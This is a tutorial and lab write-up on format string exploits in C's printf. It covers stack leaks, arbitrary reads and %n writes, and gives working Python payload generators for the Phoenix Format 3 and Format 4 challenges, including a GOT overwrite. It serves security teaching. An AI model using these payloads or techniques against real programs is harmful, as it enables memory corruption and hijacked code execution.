Format String Exploits

Theory

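A format string vulnerability occurs when user input is passed to printf as the format string itself:

printf(USER_INPUT, A, B);

It does not occur when user input is only passed as an argument to a fixed format string:

printf("string: %s", USER_INPUT);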

Reading from the stack

You can specify more conversion specifiers than there are arguments to the printf call, thereby reading more from the stack than was intended:

printf("%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x");
-> will print the next 20 items on the stack

Accessing the n-th element

An attacker can even access the n-th argument directly by using the positional form of a conversion specifier:

printf("%10$x");
-> will print the tenth argument, i.e. the tenth element on the stack

Note: positional arguments are a POSIX extension and are not supported by every printf implementation. If they don’t work, you can still chain enough %x’s to reach the element you want.
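
Both ways of walking the stack are easy to generate from a script. The sketch below is only an illustration: leak_payload is a hypothetical helper name, and direct=True assumes the target's printf accepts the positional syntax.

```python
def leak_payload(n, direct=False):
    """Build a format string that prints stack word n (1-based) as hex.

    direct=True  -> positional syntax, e.g. "%10$x"
    direct=False -> n consecutive "%x." specifiers; the wanted word is
                    the last dot-separated field in the output.
    """
    if n < 1:
        raise ValueError("n must be at least 1")
    if direct:
        return "%{}$x".format(n)
    return "%x." * n


print(leak_payload(10, direct=True))
print(leak_payload(3))
```

The dot after each %x is just a separator so that the individual words can be told apart in the output.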

Reading arbitrary data

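When %s is used as the conversion specifier, printf treats the corresponding word on the stack as a pointer and prints the string found at that address. If the format string itself is stored on the stack, the attacker controls some of those words, so %s can potentially be made to read from any address, even one that is not on the stack.

printf("\xef\xbe\xad\xde%x%x%x%s", A, B, C);

For example, the above will cause printf() to print the string located at address 0xdeadbeef, provided the buffer holding the format string sits on the stack directly after the three arguments, so that %s picks up its first four bytes as the pointer.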
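
A payload like this is usually built by a script so the address bytes come out in the right order. A minimal sketch, assuming a 32-bit little-endian target; read_payload and its skip parameter are hypothetical names, and the right value for skip depends on the target's stack layout and has to be found by experiment.

```python
import struct


def read_payload(address, skip=3):
    """Return <address, little-endian> + skip * "%x" + "%s" as bytes.

    skip is the number of stack words printf must step over before it
    reaches the word that holds the address (an assumption about the
    target, not something this script can discover).
    """
    return struct.pack("<I", address) + b"%x" * skip + b"%s"


payload = read_payload(0xDEADBEEF)
print(payload)
```

Keep in mind that an address containing a zero byte would end the format string early if the program reads its input as a C string.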

Writing to an address

%n will cause the number of characters written so far to be stored into the corresponding function argument. For example, the following code will store the integer 5 into the variable num_char:

int num_char; 
printf("11111%n", &num_char);

With dummy output characters and width-controlling format specifiers, the attacker can now write arbitrary integers to the location pointed to by the function argument.

For example, %10d will pad the value to 10 characters.

int num_char;
printf("%10d%n", 0, &num_char); 
-> will print "         0" (nine spaces followed by 0), num_char is 10
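
Python's % operator follows the same width rule as printf for %d, so the count that %n would store can be checked without compiling anything. This only models the length of the output, since Python has no %n.

```python
# "%10d" right-aligns the number in a field of 10 characters.
printed = "%10d" % 0

# %n would store the number of characters produced so far.
num_char = len(printed)

print(repr(printed), num_char)
```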

By adding a length modifier to %n, the attacker also controls how many bytes each write stores:

printf("%10d%n", 0, &num_char); -> writes 4 bytes to &num_char
printf("%10d%hn", 0, &num_char); -> writes 2 bytes to &num_char
printf("%10d%hhn", 0, &num_char); -> writes 1 byte to &num_char
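
To see what actually lands in memory for a given character count, the stores can be modelled in a few lines. This is a sketch assuming a little-endian target where int is 4 bytes and short is 2 bytes; stored_bytes is a hypothetical helper, and %hhn is the 1-byte variant of %n.

```python
import struct

# struct codes for the integer each variant stores
# (assumed sizes: int = 4 bytes, short = 2 bytes, char = 1 byte).
SIZES = {"n": "<I", "hn": "<H", "hhn": "<B"}


def stored_bytes(count, spec):
    """Bytes that %n / %hn / %hhn would place in memory for a given count."""
    fmt = SIZES[spec]
    width = struct.calcsize(fmt)
    mask = (1 << (8 * width)) - 1
    # The count is truncated to the size of the destination type.
    return struct.pack(fmt, count & mask)


for spec in ("n", "hn", "hhn"):
    print(spec, stored_bytes(0x145, spec).hex())
```

With a count of 0x145, only the 1-byte variant leaves the neighbouring bytes alone. The others also store the 0x01 (and zeros) above the wanted 0x45.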

If you just want to crash the application, a run of %s specifiers will usually cause a segmentation fault, because each one dereferences whatever word happens to be next on the stack:

printf("%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s");

Writing arbitrary values to arbitrary addresses

If you want to write a 32-bit integer to an address with a single %n, the padding may need to be as large as 2,147,483,647 characters. That’s too much, so you should instead write 1 or 2 bytes at a time. The Phoenix Format 3 example below writes 1 byte at a time using plain %n, which stores 4 bytes on every write and therefore spills into the bytes after the target. Keep in mind that the %hn length modifier (2 bytes per write) is safer, since your writes won’t overflow into unintended addresses.

We start with the least significant byte, which on a little-endian machine is the byte at the lowest address (the last two hex digits of the value as written), and then keep overwriting the next higher byte, one byte at a time.
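
The byte order is easy to get wrong, so here is a small sketch that splits a value into the individual writes. It assumes a 32-bit little-endian target; byte_writes is a hypothetical helper, and the address and value are the ones from the Phoenix Format 3 challenge.

```python
import struct


def byte_writes(address, value):
    """Split a 32-bit value into (address, byte) pairs, lowest address first."""
    return [(address + i, b) for i, b in enumerate(struct.pack("<I", value))]


for addr, byte in byte_writes(0x08049844, 0x64457845):
    print(hex(addr), hex(byte))
```

The first pair is the least significant byte at the lowest address, which is the order the writes are performed in.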

Phoenix Format 3 exploitation

Note 1: The writes spill past the changeme variable and overwrite the bytes that follow it. Hopefully that doesn't break anything.

Note 2: You can put the addresses before the %p's, which makes the payload significantly shorter.

I wrote a script to generate the payload.

#!/usr/bin/python3

import sys

# The four byte addresses of the target, reversed into little-endian order
address1 = b"\x08\x04\x98\x44"[::-1]
address2 = b"\x08\x04\x98\x45"[::-1]
address3 = b"\x08\x04\x98\x46"[::-1]
address4 = b"\x08\x04\x98\x47"[::-1]

buf = b''
buf += address1
buf += b'AAAA' # Dummy word consumed by the %<width>p before the second %n
buf += address2
buf += b'BBBB' # Dummy word consumed by the %<width>p before the third %n
buf += address3
buf += b'CCCC' # Dummy word consumed by the %<width>p before the fourth %n
buf += address4

buf += b'%p ' * 10 # Get to the start of the buffer

buf += b'%219p ' # Pad so the low byte of the character count becomes 0x45
buf += b'%n '  # Write the first byte - 0x45
buf += b'%49p '
buf += b'%n ' # Write the second byte - 0x78
buf += b'%203p '
buf += b'%n ' # Write the third byte - 0x45
buf += b'%29p '
buf += b'%n ' # Write the fourth byte - 0x64

# Write raw bytes: print() on a str would re-encode bytes >= 0x80 as UTF-8
sys.stdout.buffer.write(buf + b'\n')

Exploit with:

python3 ~/format/format3/exploit.py | ./format-three

Phoenix Format 3 explanation

The goal of this challenge is to write the value 0x64457845 to the address 0x08049844.

The first things in the payload are the 4 addresses we want to write to (1 address for each byte), separated by some padding.

Then, enough conversion specifiers are added to walk through the stack up to the start of the payload. In this case, 11 %p’s are needed, so we first write 10 plain %p’s and then %219p. The width of 219 adds enough padding that the low byte of the number of characters written so far is 0x45. 0x45 is the least significant byte of the value 0x64457845, and therefore the first byte we need to write.

Then, since the next value on the stack is the first address and the character count has the right low byte, we can add a %n to write 0x45 to 0x08049844. A plain %n stores a full 4-byte integer, so it also overwrites 0x08049845 through 0x08049847 with the upper bytes of the count, but we will overwrite those in the following steps anyway, so it doesn’t really matter.

Then, %49p prints enough characters that the low byte of the character count becomes 0x78, and the following %n writes that value to the next address in the payload, 0x08049845, 1 byte higher than the previous one. The %49p itself consumes the dummy word that sits between the two addresses.

Then, %203p wraps the low byte of the character count around past 0xff and back to 0x45. We write it to the third address using %n.

And after repeating the step again to write the last byte to the last address, we will have written the desired value to the desired address!

The last %n also spills 3 bytes into the addresses just past the target (0x08049848 to 0x0804984a), but hopefully that won’t break anything.
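
The overlapping writes can be replayed offline to check that they really leave the wanted value behind. This is a sketch, not the challenge itself: simulate is a hypothetical helper, and the full character counts (0x145, 0x178, 0x245, 0x264) are inferred from the widths in the script under the assumption that 105 characters were printed before %219p. Only their low bytes are stated in the script.

```python
import struct


def simulate(counts, size=4):
    """Apply one size-byte little-endian write per count, each one byte higher."""
    mem = bytearray(len(counts) - 1 + size)
    for offset, count in enumerate(counts):
        # Plain %n stores the whole 4-byte count, clobbering later bytes.
        mem[offset:offset + size] = struct.pack("<I", count & 0xFFFFFFFF)[:size]
    return bytes(mem)


# Assumed character counts at each of the four %n's.
mem = simulate([0x145, 0x178, 0x245, 0x264])
value = struct.unpack("<I", mem[:4])[0]
print(hex(value), mem[4:].hex())
```

The first four bytes read back as the target value, and the remaining three are the spill-over from the last write.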

Arbitrary code execution

It should be possible to use the format string exploit to overwrite the saved function return address just like we did in the stack smashing section.

Instead, we will overwrite an entry in the Global Offset Table (GOT) to gain code execution. This is based on Phoenix Format 4.

Analysing the GOT flow

The program looks something like this:

printf(user_input);
exit(0);

Looking at it in radare, this is what the call to the exit function looks like:

0x080484fe b    e82dfeffff     call sym.imp.exit   ; void exit(int status);

If we step into that call, the execution goes to this line:

0x08048330      ff25e4970408   jmp dword [reloc.exit_228]  ; "C......." @ 0x80497e4

This jumps to the address stored at reloc.exit_228:

pf x @reloc.exit_228
0x080497e4 = 0xf7f7f543

And indeed, stepping once further, we end up at the address 0xf7f7f543.

So if we can change the value stored at 0x080497e4 to some other address (in the Phoenix challenge, to 0x08048503), then the call to exit will jump to that other address instead.
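
The addresses in the two disassembly lines can be recovered from the raw instruction bytes, which is a handy cross-check when the disassembler's symbol names are confusing. A small sketch using only the bytes and addresses shown above (e8 is a call with a signed 32-bit relative offset, ff 25 is a jmp through an absolute 32-bit memory address); the variable names are mine.

```python
import struct

# call sym.imp.exit: opcode e8 followed by a signed 32-bit relative offset
call_addr = 0x080484FE
call_bytes = bytes.fromhex("e82dfeffff")
rel32 = struct.unpack("<i", call_bytes[1:])[0]
# The offset is relative to the address of the instruction after the call.
plt_entry = call_addr + len(call_bytes) + rel32

# jmp dword [addr]: opcode ff 25 followed by an absolute 32-bit address
jmp_bytes = bytes.fromhex("ff25e4970408")
got_slot = struct.unpack("<I", jmp_bytes[2:])[0]

print(hex(plt_entry), hex(got_slot))
```

The call lands on the jmp at 0x08048330, and the jmp reads its destination from 0x080497e4, which is the slot the exploit overwrites.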

Solution

Changing the code from “writing arbitrary values to arbitrary addresses” slightly, I arrived at the following solution:

#!/usr/bin/python3

import sys

address1 = b"\x08\x04\x97\xe4"[::-1] 
address2 = b"\x08\x04\x97\xe5"[::-1] 
address3 = b"\x08\x04\x97\xe6"[::-1] 
address4 = b"\x08\x04\x97\xe7"[::-1] 

buf = b''
buf += address1
buf += b'AAAA' # Dummy word consumed by the %<width>p before the second %n
buf += address2
buf += b'BBBB' # Dummy word consumed by the %<width>p before the third %n
buf += address3
buf += b'CCCC' # Dummy word consumed by the %<width>p before the fourth %n
buf += address4

# Value we want to write: 0x08048503
buf += b'%p ' * 10 # Get to the start of the buffer
buf += b'%153p ' # Add extra bytes to %n. It will go to 0x103.
buf += b'%n '  # Write the first byte - 0x03. The 0x01 from the 0x103 lands in the next byte and is overwritten by the next write.
buf += b'%128p ' # Add extra bytes to %n. It will go to 0x185.
buf += b'%n '  # Write the second byte - 0x85
buf += b'%125p ' # Add extra bytes to %n. It will go to 0x204.
buf += b'%n '  # Write the third byte - 0x04
buf += b'%258p ' # Add extra bytes to %n. It will go to 0x308. A width of 2 would be narrower than the printed pointer, so 256 is added.
buf += b'%n '  # Write the fourth byte - 0x08

with open('/home/user/input.txt', 'wb') as f:
  f.write(buf)

Exploit with:

python3 ~/format/format4/exploit.py; cat ~/input.txt | ./format-four
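
The widths in the script do not have to be found by trial and error. The sketch below recomputes them under two assumptions that are mine, not the challenge's: 105 characters have been printed before the first padded %p (28 bytes of addresses and dummy words plus 77 characters from the ten "%p "), and a printed 32-bit pointer is at most 10 characters wide. widths_for is a hypothetical helper.

```python
def widths_for(target, start_count, min_width=10):
    """Return the %<width>p widths that make each %n see the next target byte.

    Models the script's layout: every "%<width>p " prints width + 1
    characters, and every "%n " prints one more space afterwards.
    """
    count = start_count
    widths = []
    for shift in range(0, 32, 8):
        want = (target >> shift) & 0xFF
        width = (want - count - 1) % 256
        if width < min_width:
            width += 256  # too narrow to pad the pointer; wrap once more
        widths.append(width)
        count += width + 1  # padded pointer plus trailing space
        count += 1          # space after "%n"
    return widths


print(widths_for(0x08048503, start_count=105))
print(widths_for(0x64457845, start_count=105))
```

Under those assumptions the function reproduces the widths used in both the Format 4 and Format 3 scripts. If the target prints a different number of characters for the ten %p's, start_count has to be adjusted to match.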
